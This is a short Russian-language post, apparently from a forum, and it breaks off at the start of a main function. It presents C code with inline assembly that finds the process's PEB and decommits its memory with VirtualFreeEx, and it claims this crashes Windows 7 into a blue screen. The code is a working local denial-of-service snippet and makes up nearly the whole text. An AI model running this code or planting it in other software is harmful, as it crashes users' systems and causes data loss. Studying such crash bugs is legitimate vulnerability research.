Старый добрый DOS с декоммитом Peb валит win7 в BSOD:
void FreePeb()
{
PVOID pebAddress = NULL;
__asm
{
mov eax, DWORD ptr fs:[0x30]
mov DWORD ptr [pebAddress], eax
}
VirtualFreeEx( GetCurrentProcess(), pebAddress, 0, MEM_DECOMMIT );
}
int wmain( int...